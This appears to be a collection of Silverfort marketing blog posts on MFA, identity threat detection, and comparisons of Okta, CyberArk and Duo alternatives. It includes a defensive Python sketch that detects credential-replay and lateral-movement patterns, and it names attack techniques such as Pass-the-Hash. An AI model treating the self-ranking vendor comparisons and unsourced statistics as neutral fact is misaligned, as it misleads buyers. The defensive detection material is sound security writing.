Whether you are a bank, healthcare provider, or retail organization, safeguarding sensitive data is paramount. As cyberattacks evolve, securing critical resources and data requires more than just a password. Over 80% of breaches are caused by weak or compromised passwords, emphasizing the need for stronger, layered defenses. Multi-factor authentication (MFA) is the most effective single control for securing user accounts, blocking 99.9% of automated account-compromise attacks and significantly strengthening an organization's cybersecurity strategy. Let us dive deeper into how MFA works, its vital role in cybersecurity, and essential implementation strategies for securing your enterprise.
Defining Multi-Factor Authentication

Multi-Factor Authentication (MFA) requires users to present two or more independent verification factors, making the authentication process both more demanding and more effective than Single-Factor Authentication (SFA); Two-Factor Authentication (2FA) is simply the two-factor case of MFA. MFA strengthens access by combining "something you know" (e.g., a password), "something you have" (e.g., a mobile device or token), and "something you are" (e.g., biometric data).

Why MFA is Vital for Cybersecurity

Relying on passwords alone is no longer viable, as they fall prey to brute-force attacks, phishing, and credential stuffing. MFA counters such attacks by enforcing a second and even third layer of verification, deterring unauthorized access. It elevates security while aligning with the industry regulations and compliance standards essential for long-term data integrity.

Key Benefits of MFA:

- Enhanced Security: Layered authentication reduces the risk of unauthorized access and data breaches.
- Mitigation of Common Threats: Phishing, credential theft, and lateral movement attacks are far harder to carry out against MFA-protected accounts. Note that OTP and push-based factors can still be relayed by real-time phishing or worn down by push fatigue; phishing-resistant factors such as FIDO2/WebAuthn close that gap.

Types of Authentication Factors in MFA

- Knowledge Factors: Information only the user knows, like passwords or security answers. While familiar, these are vulnerable to phishing and need to be backed by a second factor.
- Possession Factors: Physical items like a smartphone, hardware token, or smart card provide strong verification and resist remote compromise.
- Inherence Factors: Unique to the user, biometrics such as fingerprints or facial recognition offer a secure, convenient method, though privacy concerns arise without proper safeguards.

Best Practices for Implementing MFA in Your Organization

Securing your enterprise with MFA requires a strategic approach that considers operational compatibility, user experience, and comprehensive resource protection.

1. Evaluate Security Requirements: Assess which systems and accounts require protection and identify vulnerable entry points. Consider future scaling requirements and ensure the MFA solution can support anticipated growth.
2. Select Suitable Authentication Factors: Balance security needs with user convenience, combining possession, knowledge, and inherence factors to optimize verification across resources.
3. Compare MFA Solutions for Compatibility: Evaluate MFA solutions for compatibility with your existing IT infrastructure and prioritize options that offer broad integration with on-premises, cloud, and hybrid environments.
4. Develop a Comprehensive Deployment Plan: Roll MFA out incrementally to ensure smooth adoption, while monitoring continuously to detect and address configuration gaps.
5. User Education and Training: Training employees is essential; effective MFA adoption requires awareness of why it matters and step-by-step guidance on usage.
6. Continuous Monitoring and Incident Response: Cyber threats evolve; so should your MFA. Continuous monitoring and adaptive policies help maintain security. Regular audits ensure compliance with industry regulations and provide documentation for updates.

Addressing MFA Implementation Challenges

While MFA is a powerful tool, challenges can arise:

- User Inconvenience: An overly complex MFA process leads to resistance. Educate users on MFA's value and choose solutions optimized for usability.
- Technical Interoperability: Certain access interfaces, especially in legacy systems, lack native MFA support. Silverfort's unified identity protection addresses these gaps, offering agentless, proxyless integration across diverse systems.

MFA as an Industry Standard

In sectors from finance to healthcare, MFA is not just a recommendation but a regulatory necessity.
Compliance with standards like CJIS, NYDFS, HIPAA, NIST, and GDPR calls for robust identity protection across systems, ensuring data integrity and reducing the liabilities associated with data breaches.

Silverfort's adaptive MFA solution is a robust answer to these requirements, providing seamless MFA across both modern and legacy applications, including those previously considered "unprotectable." Its agentless design ensures full coverage with minimal operational burden, maximizing security without disrupting workflows.

The Future of Cybersecurity is MFA-Protected

As cyber threats become more sophisticated, MFA's role will only grow. MFA offers invaluable protection, fortifying sensitive data against unauthorized access and fulfilling compliance requirements. For organizations ready to elevate their cybersecurity, embracing a solution like Silverfort's agentless, adaptive MFA is the next logical step. Empower your organization with comprehensive MFA protection: contact us to explore how our unified identity protection platform can secure every facet of your environment.

---

- Published: 2024-05-29
- Modified: 2024-10-02
- URL: https://www.silverfort.com/blog/top-5-evaluation-criteria-for-choosing-the-right-itdr-tool/

Identity is now a top priority for security decision makers. The need to counter malicious TTPs such as credential access, privilege escalation and lateral movement has never been more urgent. When over 80% of breaches involve the use of compromised credentials and ransomware attacks take down even the largest organizations, the price of neglecting identity security is unaffordable. This state of affairs has led to the rise of a product category purpose-built for protecting the identity attack surface: Identity Threat Detection and Response (ITDR).
However, the introduction of a new category inevitably entails a period of confusion for buyers, during which identity security teams must figure out which ITDR capabilities are mandatory and which are merely nice to have. This article assists organizations in that journey by providing the top five evaluation criteria for assessing how well an ITDR solution can deliver on its promises.

Evaluation criteria #1: The breadth and depth of coverage

The identity attack surface is extremely heterogeneous and comprises multiple components. We can classify these into the following groups:

Resources: The on-prem environment includes workstations and servers, IT infrastructure, databases, and legacy apps. Some virtual machines run on data center servers, while IaaS virtual machines reside in the public cloud. These are joined by corporate SaaS and web apps for storage, email and other purposes.

Protocols and access methods: Active Directory uses protocols such as NTLM, Kerberos, and LDAP to manage access to servers, workstations, and other on-prem resources. This access is carried out in various ways: command line, RDP, and dedicated remote access tools (TeamViewer and others like it). VPN remote access usually authenticates via RADIUS, while federation servers and cloud IdPs use SAML, OpenID Connect, and OAuth to grant access to SaaS apps through users' web browsers.

User accounts: There are also various types of users: standard, privileged, human and non-human. Some are easier to detect and monitor, while others are more challenging. A prominent example is Non-Human Identities (NHI) such as service accounts in Active Directory environments, which are extremely hard to locate and map.

An ITDR solution must be able to apply its capabilities to all users, resources, and access methods in the hybrid environment.

Why does it matter?

To truly protect an attack surface you must protect all of it, without blind spots.
Protecting only part of it simply leaves the path clear for adversaries to target the unprotected portion instead. That is why, for example, lateral movement and ransomware propagation are carried out mostly via command-line access (PsExec, PowerShell remoting, WMI and similar tools) rather than RDP: the latter is usually protected with MFA, while the former cannot be covered by conventional MFA. Securing a single access method to a server is not sufficient when other access paths to it remain unsecured.

Evaluation criteria #2: As near real time as possible

ITDR solutions analyze user authentications and access attempts to surface potential threats. Real-time analysis gives the ITDR visibility into each authentication from the initiation and verification stages through to actual completion and access. The alternative is to analyze the authentication log after the access attempt has already been approved or denied.

Why does it matter?

The purpose of ITDR is to detect suspected malicious activity. The closer this analysis is to the real-time authentication event, the better its chances of catching malicious access before it matures into an actual threat. Additionally, some anomalies can only be detected during the authentication itself; these are a blind spot for ITDR solutions that rely on retroactive log analysis.

Evaluation criteria #3: Multi-layered detection engine

Detecting malicious activity relies on spotting anomalies that deviate from standard legitimate behavior. However, this is not black and white: while some anomalies are clearly associated with malicious activity, most can also occur for unrelated, benign reasons. A risk engine capable of detecting several different types of anomalies, and weighing them together, increases accuracy and reduces false positives.
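As an added illustration of the multi-layered approach this criterion describes (example code written for this page, not Silverfort's engine), the Python below scores constructed Kerberos-style authentication events against a per-user baseline and intersects three independently derived signals: a user anomaly (a resource absent from the account's baseline), a protocol anomaly (an encryption type weaker than the account has ever used, such as RC4 where AES is the norm) and a behavior anomaly (fan-out to several never-seen targets inside a short window). The event fields, the ten-minute window, the fan-out threshold and the mapping from signal count to action (log, step-up MFA, block) are assumptions made for the example.

```python
"""Toy multi-layered identity risk engine.

Added example for this page, not Silverfort code. It intersects independent
anomaly signals over authentication events so that a single noisy anomaly
only logs, while several coinciding anomalies escalate to MFA or a block.
Event format, window, threshold and action mapping are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Kerberos encryption-type numbers (RFC 3961, RFC 4757, RFC 8009).
STRONG_ETYPES = {17, 18, 19, 20}   # aes128/aes256-cts-hmac (sha1 and sha2 variants)
WEAK_ETYPES = {1, 3, 23}           # des-cbc-crc, des-cbc-md5, rc4-hmac

FAN_OUT_WINDOW = timedelta(minutes=10)  # assumed lateral-movement window
FAN_OUT_THRESHOLD = 4                   # distinct never-seen targets in the window

# Constructed "known good" history used to build the per-user baseline.
T0 = datetime(2024, 6, 4, 9, 0, 0)
HISTORY = [
    {"user": "bob", "target": "fs01", "etype": 18, "ts": T0 - timedelta(days=3)},
    {"user": "bob", "target": "mail01", "etype": 18, "ts": T0 - timedelta(days=2)},
    {"user": "bob", "target": "fs01", "etype": 18, "ts": T0 - timedelta(days=1)},
    {"user": "alice", "target": "db01", "etype": 18, "ts": T0 - timedelta(days=1)},
]

# Constructed live events: Bob's session degrades into RC4 tickets against hosts
# he has never touched, one after another, which is what lateral movement looks like.
LIVE = [
    {"user": "bob", "target": "fs01", "etype": 18, "ts": T0},
    {"user": "bob", "target": "hr01", "etype": 18, "ts": T0 + timedelta(minutes=1)},
    {"user": "bob", "target": "hr01", "etype": 23, "ts": T0 + timedelta(minutes=2)},
    {"user": "bob", "target": "srv02", "etype": 23, "ts": T0 + timedelta(minutes=3)},
    {"user": "bob", "target": "srv03", "etype": 23, "ts": T0 + timedelta(minutes=4)},
    {"user": "bob", "target": "srv04", "etype": 23, "ts": T0 + timedelta(minutes=5)},
]


def build_baseline(history):
    """Per user: the set of resources seen, and whether only strong etypes were used."""
    baseline = defaultdict(lambda: {"targets": set(), "strong_only": True})
    for ev in history:
        entry = baseline[ev["user"]]
        entry["targets"].add(ev["target"])
        if ev["etype"] not in STRONG_ETYPES:
            entry["strong_only"] = False
    return dict(baseline)


def score_event(ev, baseline, recent):
    """Return (signals, verdict) for one event; `recent` holds live (ts, target) per user."""
    # Unknown accounts have no baseline; do not assume a strong-etype norm for them.
    entry = baseline.get(ev["user"], {"targets": set(), "strong_only": False})
    signals = []

    # User anomaly: resource absent from this account's baseline.
    if ev["target"] not in entry["targets"]:
        signals.append("user:new_resource")

    # Protocol anomaly: downgrade to RC4/DES by an account that only ever used AES.
    if entry["strong_only"] and ev["etype"] in WEAK_ETYPES:
        signals.append("protocol:weak_etype")

    # Behavior anomaly: fan-out to many never-seen targets within the trailing window.
    window = [t for ts, t in recent[ev["user"]] if ev["ts"] - ts <= FAN_OUT_WINDOW]
    window.append(ev["target"])
    unseen = {t for t in window if t not in entry["targets"]}
    if len(unseen) >= FAN_OUT_THRESHOLD:
        signals.append("behavior:fan_out")
    recent[ev["user"]].append((ev["ts"], ev["target"]))

    # Intersection rule: one signal is noise-prone and only logs; two coinciding
    # signals justify step-up MFA; three justify blocking (assumed mapping).
    verdict = {0: "allow", 1: "log", 2: "step_up_mfa"}.get(len(signals), "block")
    return signals, verdict


def run(history, live):
    """Score every live event in time order; returns [(user, target, signals, verdict)]."""
    baseline = build_baseline(history)
    recent = defaultdict(list)
    results = []
    for ev in sorted(live, key=lambda e: e["ts"]):
        signals, verdict = score_event(ev, baseline, recent)
        results.append((ev["user"], ev["target"], signals, verdict))
    return results


if __name__ == "__main__":
    for user, target, signals, verdict in run(HISTORY, LIVE):
        print(f"{user:6} -> {target:6} {verdict:12} {signals}")
```

Run as a script to see Bob's first access to a new host merely logged, the RC4 downgrade on the same host escalate to step-up MFA, and the fourth never-seen host inside ten minutes trip the block. The window, threshold and action mapping are tunable; the point is that the verdict comes from coinciding, independently derived signals rather than from any single one, which is what keeps the false-positive rate of the combined engine below that of its parts.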
The anomalies an ITDR should typically look for include:

Protocol anomalies: These result from attack techniques that exploit weaknesses in authentication protocols to gain malicious access, such as Pass-the-Ticket and Pass-the-Hash. They are called protocol anomalies because they involve an alteration of the authentication process itself.

Behavior anomalies: These occur as a result of lateral movement. Lateral movement is by nature opportunistic: the adversary hops from machine to machine in search of stored credentials and machine names that could help them reach their target. For example, an attacker who has landed on the patient-zero machine uses it as a starting point to access others one by one, searching for stored admin credentials or the computer name of a critical server. This pattern of search and movement differs greatly from standard legitimate user access.

User anomalies: Every user has their own baseline of resource access. This is especially true for non-human identities like AD service accounts, but applies to most human users as well. Excluding helpdesk and IT admins who need access to many machines for troubleshooting, most users have a defined set of resources they access in their working routine. Once an adversary compromises a user account to perform lateral movement, there is a high chance they will attempt to access resources that user has never accessed before.

Why does it matter?

While each anomaly by itself carries some percentage of false positives, the intersection between them is significantly more reliable. Here is an example: the user Bob accesses a resource he has never accessed before. Does that mean Bob is compromised? Not necessarily; naive anomalies of this kind also occur within the legitimate activity of every user. Now assume that the authentication Bob performed to access this resource used a weaker encryption type than expected (for instance, a Kerberos ticket negotiated with RC4 where Bob's account normally uses AES, which is exactly what an attacker replaying Bob's NTLM hash in an overpass-the-hash attack would produce).
While suspicious, this is also not necessarily malicious. But if both anomalies occur in the same access attempt, the probability that it is malicious rises significantly.

Evaluation criteria #4: Ability to trigger real-time identity security controls

Identity security is enforced through dedicated controls that prevent malicious access, such as access block, MFA and just-in-time access. The core role of the ITDR is to detect whether an access attempt is malicious. However, it is essential that the ITDR also has the integrations required to trigger real-time identity security controls. The most critical ones are MFA and access block.

Why does it matter?

Alerts require manual triage and investigation, and as a rule of thumb, resolving all of them is beyond the capacity of the SecOps team. An ITDR that can use its detection signals to trigger MFA or block access provides automated real-time protection, stopping malicious activity rather than merely reporting its presence.

Evaluation criteria #5: Seamless integration with the security stack

While ITDR owns the identity aspect of cyber attacks, this is only a part, albeit a significant one, of the whole threat protection story. To offer comprehensive protection, an ITDR solution should be able to exchange data and risk signals with the other key components of the security stack. For example, the EDR/XDR should be able to provide the ITDR with data on suspicious processes and files, and the firewall or ZTNA with open ports and traffic origin/destination. The ITDR should also share data with the SIEM, adding identity security signals to the full context of network and file activity, and take part in automated SOAR workflows.

Why does it matter?

Increases accuracy: Every security solution has a type of activity it can monitor and analyze, and others that it is blind to.
For example, just as endpoint protection solutions are blind to the authentication process, the ITDR is blind to running processes and executing files. Intersecting the two perspectives increases accuracy and efficiency.

Better operability: SecOps teams employ a multitude of security tools. However, there is usually one component, the SIEM or XDR, that operates as the main interface from which alerts are managed. The ITDR must fit seamlessly into the workflows of this interface to deliver its security value.

ITDR is a key factor in reducing the probability and impact of identity threats

The purpose of ITDR is to reduce the probability and impact of a successful identity-related attack. The criteria discussed in this article were singled out for their contribution to that goal. Have you already shortlisted some ITDR solutions? Use these criteria to ask the hard questions. The answers will tell you whether the solution you are looking at can reduce your identity risk and provide the resilience you are looking for.

---

- Published: 2024-05-27
- Modified: 2024-11-27
- URL: https://www.silverfort.com/blog/top-okta-alternatives/

Okta has established itself as a leader in Identity and Access Management (IAM), providing powerful user authentication and authorization across many industries. However, Okta may not always be the best choice for smaller organizations or for organizations seeking a flexible, cost-effective security solution. Today's IAM market offers a variety of options, each with distinct capabilities tailored to the demands of different businesses. To ensure an IAM solution aligns with your organization's specific goals, budget, and cybersecurity policy, it is essential to evaluate the candidates before making a final decision.
Key Criteria for Selecting an Okta Alternative in 2025

With 80% of breaches linked to compromised identities, organizations need IAM solutions that provide seamless access control and resilient user verification. Let us examine the critical factors to consider when selecting an IAM provider in today's complex security landscape.

Essential Features to Evaluate

- User Authentication: IAM solutions should simplify user verification with security controls such as Multi-Factor Authentication (MFA), biometrics, and password protection, ensuring that only verified users gain access.
- User Authorization: Strong authorization lets administrators assign permissions precisely, granting privileged access only to authorized individuals and limiting exposure of sensitive resources.
- Single Sign-On (SSO): By letting users access multiple applications with a single credential set, SSO mitigates password fatigue and centralizes authentication events for visibility and monitoring.
- Zero Trust Architecture: Built on the principle of "never trust, always verify," Zero Trust adds layers of control, minimizing lateral movement and enforcing strict access validation.
- Role-Based Access Control (RBAC): Simplifies access management by assigning permissions based on user roles, ensuring everyone has the access level they need to do their jobs securely.
- Audit and Reporting: Maintaining audit trails is essential for tracking activity and detecting anomalies. Effective IAM solutions offer comprehensive reporting to support compliance and enhance transparency.

Cost Considerations

- Budget Suitability: Assess total costs, including licensing, deployment, maintenance, and scalability, to ensure they align with your organization's budget.
- Flexible Pricing Models: Seek IAM providers that offer customizable and transparent pricing structures to support your financial planning and scalability goals.
Usability and Integration Capabilities

- User-Friendly Interface: A well-designed IAM solution should be intuitive, with a streamlined interface that simplifies deployment and maintenance.
- Compatibility with Existing Infrastructure: Your IAM solution should integrate seamlessly with current IT systems, cloud environments, and directories to support cohesive resource management.

Customer Support and Resources

- Reliability of Customer Support: Quick, accessible support is crucial, especially during security incidents. Evaluate provider response times, support channels, and community resources.

Top Okta Alternatives for IAM in 2025

1. Silverfort

Pros: Silverfort offers a comprehensive identity security solution that extends across on-premises, cloud, and hybrid environments. Its MFA, Identity Threat Detection and Response (ITDR), SSO capabilities, and adaptive deny policies provide complete visibility and control over user activity.
Cons: Not a traditional IAM (directory and SSO) product; it layers on top of, and integrates with, every existing IAM platform.
Pricing: Contact Silverfort for tailored pricing information.
Best for: Organizations seeking a unified solution to enforce security seamlessly across cloud and on-premises systems.

2. JumpCloud

Pros: As a cloud-native solution, JumpCloud offers extensive device authentication and configuration policies for secure identity management.
Cons: Limited SSO capabilities and complex configuration.
Pricing: Starts at $13 per user per month with annual billing; additional user lifecycle management at $11 per user per month.
Best for: Companies prioritizing a cloud-native approach to IAM, especially in the tech or education sectors.

3. CyberArk Identity Security

Pros: Known for its intuitive interface and privileged access management, CyberArk offers MFA and self-hosting options that integrate easily with other security solutions.
Cons: Limited reporting features and less comprehensive documentation.
Pricing: Tiered subscriptions available upon request, including a 30-day free trial.   Best for: Large enterprises requiring robust access controls and data security management.   4. OneLogin  Pros: Delivers adaptive MFA and customizable options within an intuitive interface.   Cons: Requires reliable internet access and may experience unexpected logouts.   Pricing: Starts at $2 per user per month for SSO, with minimum users required. Advanced MFA features start at $4 per user per month.   Best for: Medium-to-large organizations with moderate security requirements.   5. Ping Identity  Pros: Offers flexible MFA across devices and environments, supporting on-premises, cloud, and hybrid configurations.   Cons: Primarily tailored for larger enterprises; limited offline functionality and reliance on internet connectivity for notifications.   Pricing: Begins at $20,000 annually; 30-day trial available.   Best for: Large enterprises with scaling needs and complex infrastructure requirements.   6. Oracle Identity Cloud Service  Pros: Oracle’s cloud IAM solution is user-friendly, automates access management, and simplifies deployment.   Cons: Customization is complex, and the service may be cost-prohibitive for smaller businesses.   Pricing: Quotation-based plans billed monthly based on user activity.   Best for: Large organizations with high data security requirements and a budget to match.   7. Cisco Duo Security  Pros: Cloud-based IAM platform with reliable MFA and seamless authentication processes.   Cons: Notification delays and configuration limitations for advanced access control.   Pricing: Subscription-based, starting at $3 per user per month; a free plan is available.   Best for: Enterprises requiring centralized IAM solutions with flexible pricing.   8. Microsoft Entra (formerly Azure AD)  Pros: Offers a comprehensive ecosystem that supports hybrid environments, allowing organizations to manage on-premises and cloud resources efficiently.   
Cons: The platform may involve a steeper learning curve for organizations not already invested in the Microsoft ecosystem, and its advanced features can require additional licenses.   Pricing: Free and tiered paid plans start at $6 per user per month, with advanced security and governance features available in the Premium P2 plan at $9 per user per month.   Best for: Enterprises deeply integrated with Microsoft products and those seeking a unified identity management solution with strong hybrid and cloud capabilities.   Best Okta Alternatives: Making Your Final Decision  Selecting the right IAM solution hinges on your organization’s unique needs. While traditional or high-cost IAM tools may be impractical for small-to-medium enterprises, larger organizations face risks if they adopt tools that lack essential security features. By following the criteria outlined here and conducting an internal assessment of your needs and budget, you will be well-equipped to make an informed choice.   Looking for an IAM solution that scales with your environment? Explore Silverfort’s unified identity security platform to see how it can fortify your access control and user verification. Book a demo today to learn more!   --- - Published: 2024-05-27 - Modified: 2024-11-27 - URL: https://www.silverfort.com/blog/leading-alternatives-to-cyberark/ Privileged Access Management (PAM) is essential in cybersecurity, especially given that 74% of breaches involve unauthorized access to privileged accounts. Securing these accounts is critical to prevent brute-force attacks, password compromises, and compliance violations. CyberArk has long been a frontrunner in PAM, offering key features like threat detection and password vaulting. Yet, as cyber threats evolve, it’s crucial to assess innovative alternatives to CyberArk that offer advanced, adaptive PAM capabilities.   
This guide provides an in-depth comparison of top CyberArk alternatives, detailing the capabilities each solution brings to modern PAM challenges.

## Choosing the Optimal CyberArk Alternative

In selecting a CyberArk alternative, it’s vital to evaluate features addressing core PAM needs, such as account discovery, password management, session monitoring, compliance, and multi-factor authentication (MFA). Below are the primary criteria and top alternatives.

### Key PAM Features to Consider

- Account Discovery: Essential for identifying privileged accounts across the IT infrastructure and bringing them under PAM oversight.
- Password Vaulting: Central to PAM, ensuring secure storage of credentials with strict access controls.
- Session Monitoring: Provides real-time insights into privileged account usage, enabling immediate responses to suspicious activity.
- Reporting and Compliance: Facilitates detailed reporting and auditing, aiding in compliance and risk management.
- Adaptive MFA: Enhances security by dynamically enforcing authentication requirements based on access risk.
- Principle of Least Privilege: Restricts account access to only essential privileges, reducing potential exposure to malicious actors.

## Top CyberArk Alternatives for PAM

### 1. Silverfort

- Pros: Silverfort automatically detects and classifies all privileged users and can apply Just-In-Time (JIT) policies across all users. Silverfort enforces real-time access control and MFA, offering seamless integration across legacy, hybrid, and cloud ecosystems.
- Cons: Requires IT resources for deployment.
- Best For: Organizations seeking a scalable, automated solution that supports quick deployment.
- Pricing: Contact Silverfort for details.

### 2. HashiCorp Vault

- Pros: Delivers cloud-native secret management, securing passwords, tokens, and encryption keys. Credentials are securely managed and destroyed post-session.
- Cons: Requires the Boundary solution to fully enable PAM capabilities. Lacks in-depth compliance reporting.
- Best For: Large organizations with complex infrastructures needing cloud-native secrets management.
- Pricing: Free for up to 25 secrets; paid plans start at $1.58/hour for dedicated hosting.

### 3. JumpCloud

- Pros: Cloud-based PAM offering centralized management, incorporating MFA, SSO, and session monitoring.
- Cons: Limited feature set, complex user interface, and lacks a fully cloud-native password manager.
- Best For: Small to mid-sized businesses seeking cloud-based identity management.
- Pricing: Free for up to 10 users/devices; paid plans from $3/user per month.

### 4. BeyondTrust

- Pros: Supports least-privilege enforcement, robust auditing, and incident response.
- Cons: High licensing costs, and the interface can be cumbersome.
- Best For: Enterprises with remote workforces needing versatile PAM features.
- Pricing: Typically starts around $75,000/year.

### 5. Delinea

- Pros: Manages both on-premises and cloud access, with secure SSH and RDP support and detailed reporting.
- Cons: Limited third-party integrations and primarily Windows-focused.
- Best For: Enterprises needing centralized access management.
- Pricing: Quote-based.

### 6. One Identity Safeguard

- Pros: Offers session recording, vaulting, and single-account access management.
- Cons: Integration limitations and complex interface.
- Best For: Large organizations needing comprehensive access control.
- Pricing: Request via website.

### 7. Okta Advanced Server Access (ASA)

- Pros: Cloud-native PAM for hybrid setups; integrates smoothly with existing tools.
- Cons: Lacks RDP auditing and can be costly with a complex setup.
- Best For: Cloud-centric organizations.
- Pricing: $14/resource/month, with additional costs for advanced features.

## Selecting the Right CyberArk Alternative

By selecting a PAM solution tailored to your unique security landscape, you can strengthen privileged access protection, support compliance, and detect threats in real time.
Each solution presents distinct strengths, from Silverfort’s unified identity protection to HashiCorp’s robust secrets management, enabling organizations to fortify PAM according to their operational needs.

Silverfort offers a comprehensive approach to PAM, combining adaptive MFA, automated account discovery, and in-depth monitoring to secure critical systems and meet modern security standards. Schedule a demo today to learn how Silverfort can help secure your organization’s privileged access in a scalable, adaptive, and streamlined manner.

---
- Published: 2024-05-27
- Modified: 2024-11-27
- URL: https://www.silverfort.com/blog/duo-alternatives/

Every organization requires a different approach to Multi-Factor Authentication (MFA). Depending on the size, complexity, and sensitivity of an organization's data, the requirements of an MFA solution can vary significantly. To provide the necessary level of cybersecurity protection, a tailored approach to MFA is often necessary. Among the leading players in the MFA market, Cisco Duo has long offered a cloud-based access management solution and features like auditing and reporting. However, limitations such as MFA timeouts, delayed push notifications, and inconsistent customer support highlight the need for more sophisticated alternatives. Many modern MFA solutions surpass Duo's capabilities, offering stronger security features and more customization. Below, we examine some of the best alternatives for securing user identification, access control, and organizational authentication.

## Key Criteria for Selecting a Duo Alternative

Before diving into the specifics of available MFA options, consider the essential criteria any potential MFA solution must meet to ensure robust security for your organization:

- User Experience and Customer Support: A streamlined user interface and strong customer support are essential. Ease of deployment and navigation ensures smooth operations and minimizes friction while enhancing security posture.
- Offline MFA Support: Security does not stop when your systems are offline. Your MFA solution should extend to offline methods such as hardware tokens or biometrics, enabling seamless authentication even without internet access.
- Multiple Authentication Options: The MFA tool should support a broad range of authentication methods, from tokens and push notifications to biometric factors. The more versatile it is, the better equipped your organization will be to face emerging threats.
- Adaptive Authentication: Modern threats are dynamic, and your MFA solution should be too. Look for adaptive MFA features that adjust based on real-time risk, offering stronger security while maintaining user convenience.
- Integration and Scalability: MFA solutions must integrate smoothly with your current infrastructure, whether it is cloud, on-prem, or hybrid. The ability to scale with your business and adapt to changing security needs is crucial.
- Reporting and Auditing: Visibility is critical for security. A good MFA system will offer detailed auditing and reporting capabilities to monitor access patterns, check compliance adherence, and identify potential risks in real time.

## Top Alternatives to Cisco Duo

Here are some of the best alternatives to Cisco Duo, offering advanced capabilities to strengthen your organization’s identity protection efforts:

### 1. Silverfort MFA

- Pros: Silverfort’s agentless and proxyless approach integrates with any existing identity infrastructure, including legacy systems, command-line tools, and on-premises resources. Its AI-driven risk engine adapts authentication requirements in real time, covering resources that traditional MFA solutions often miss.
- Cons: Some organizations may require multiple layers of security to ensure proper verification and authentication.
- Best for: Enterprises needing comprehensive protection, especially those with complex hybrid environments that include legacy applications.

### 2. Microsoft Entra ID (Azure Active Directory)

- Pros: Offers robust SSO, real-time visibility, and identity protection features. It is a great option for cloud-first environments.
- Cons: Higher costs and occasional outages can be a drawback. The interface is also complex for some users.
- Best for: Organizations fully transitioning to cloud environments or scaling up existing security infrastructures.

### 3. Okta MFA

- Pros: A cloud-native identity and access management tool, Okta offers deep auditing features and integrates well with other tools, enhancing your security infrastructure.
- Cons: Push notifications and logins can experience delays, and legacy systems need external syncing.
- Best for: Organizations just beginning to build out their identity and security infrastructure.

### 4. ManageEngine ADSelfService Plus

- Pros: Specializes in password management and identity security. It includes self-service tools for password resets and account unlocking, enhancing security for both endpoints and cloud apps.
- Cons: Key features are locked behind premium plans, making it pricey. Additionally, integration with hybrid environments can be slow.
- Best for: Larger organizations with dedicated IT budgets, especially in the finance or IT sectors.

### 5. Thales SafeNet Authentication Service (SAS)

- Pros: A cloud-based solution with flexible access management and strong monitoring capabilities. It provides a wide range of authentication tools for securing user identities.
- Cons: Requires additional software for full integration with on-prem environments. Many features are outdated, with no recent updates.
- Best for: Enterprises needing secure SSO and user access management for cloud applications.

### 6. IBM Security Verify

- Pros: This robust IAM solution supports MFA for web apps, mobile devices, and desktop environments.
- Cons: Its deployment process can be complex, and limited reporting may be a challenge for detailed audits.
- Best for: Large enterprises with significant on-prem and cloud resources transitioning to comprehensive IAM solutions.

### 7. SecureAuth Arculix

- Pros: A flexible, passwordless MFA platform with AI-driven risk analysis, it offers extensive policy customization.
- Cons: Remote MFA enrollment can be difficult, and the mobile experience is not always smooth.
- Best for: SMBs and enterprises seeking a flexible solution with self-service capabilities.

| Solution | Pros | Cons | Pricing | Best for |
| --- | --- | --- | --- | --- |
| Silverfort | Comprehensive adaptive MFA. Integrates with all MFA/IAM tools. Real-time coverage with robust reporting. Automated account discovery and protection. | Might require extra steps to secure access and verify users. | Contact Silverfort for detailed pricing. | Organizations seeking high-grade protection, especially for cloud and legacy systems, with robust auditing and automation. |
| Microsoft Entra ID | Great for cloud-centric environments. Offers real-time visibility and SSO. Identity protection tools. | More expensive than other MFA solutions. Reported outages. Complex to use and navigate. | Several plans available. Microsoft Entra ID P1 starts from $6 per user/month. ID P2 costs $9 per user/month. Microsoft Entra Suite starts from $12.00 per user/month. | Organizations looking to entirely transition to the cloud or support their existing tools. |
| Okta MFA | Configurable MFA and SSO add-ons. Robust auditing. Integrates with other tools. | On-prem and legacy MFA require syncing with other software. Frequent time lags with push notifications and logins. | Their MFA plan starts at $3 per user/month. | Businesses just starting to set up their security infrastructures. |
| ManageEngine ADSelfService Plus | Robust password management. Self-service options. Secure endpoint and cloud logins. | Expensive premium plans, featuring key MFA tools. Complex integration. Limited customization. | Annual subscriptions, from $195 for standard MFA (100 domain users). | Larger businesses with a robust budget, especially those in IT and finance. |
| Thales SafeNet Authentication Service (SAS) | Great for cloud-based environments. Strong reporting and monitoring. Flexible access management. | Requires additional software to fully operate in on-prem and hybrid systems. Pricey features sold separately. No new features added. | Custom pricing quotes. | Organizations seeking integrated SSO with secure user access in cloud and web-based apps. |
| IBM Security Verify | Solid MFA for web apps, desktop, and mobile. Works with cloud and on-premise systems. Configurable risk-level settings. | Insufficient troubleshooting documentation. Deployment is long and complex. Limited reporting options. | Based on usage and features. E.g., Adaptive MFA for 1,000 users is $3.75 per user/month. | Enterprises that are slowly transitioning to cloud IAM. |
| SecureAuth Arculix | Passwordless MFA. Easy policy creation. Machine learning for assigning risk scores. | Frustrating mobile experience. Delayed customer support. Complex MFA enrollment remotely. | Undisclosed. Reach out via their website for details. | SMBs and enterprises seeking flexible MFA with good self-service. |

## Conclusion: Selecting the Right Duo Alternative

When evaluating alternatives to Cisco Duo, the goal is not just to replace one tool with another; it is about finding a solution that fits your unique needs, enhances your cybersecurity efforts, and scales with your organization. Silverfort, with its comprehensive adaptive MFA, covers all bases by protecting legacy systems, offline devices, and cloud applications alike. It is a clear leader for organizations seeking an all-in-one solution to elevate their security posture.

To explore how Silverfort can protect your entire organization, schedule a demo today!
---
- Published: 2024-05-27
- Modified: 2024-11-27
- URL: https://www.silverfort.com/blog/top-multi-factor-authentication-mfa-solutions/

In cybersecurity, the best defense is often layered. As attackers get smarter, so must our defenses, and no security measure is as foundational today as Multi-Factor Authentication (MFA). MFA protects your organization by requiring users to verify their identities with multiple forms of credentials, making unauthorized access significantly more difficult. Below, we outline essential MFA features, the top solutions on the market, and key considerations to help you choose the best tool for your security needs in 2025.

## Understanding Multi-Factor Authentication (MFA)

MFA is a security method that enhances login security by requiring more than one verification factor from the user trying to gain access to a specific resource. In practice, MFA could require:

- Something the user knows, like a password or PIN.
- Something the user possesses, such as a hardware token, smartphone, or security key.
- Something the user is, meaning biometrics like fingerprints, voice recognition, or facial scans.

Each verification layer adds an extra hurdle for attackers, ensuring only authorized users gain access.

## Core Benefits of Implementing MFA

In today’s threat landscape, 83% of businesses rely on MFA to achieve:

- Enhanced Security: MFA provides protection against phishing, password breaches, and data theft by requiring multiple forms of verification.
- Compliance Alignment: Many regulatory standards, including NIST, NYDFS, CJIS, NIS2, HIPAA and GDPR, mandate MFA as a necessary security measure to protect sensitive data.
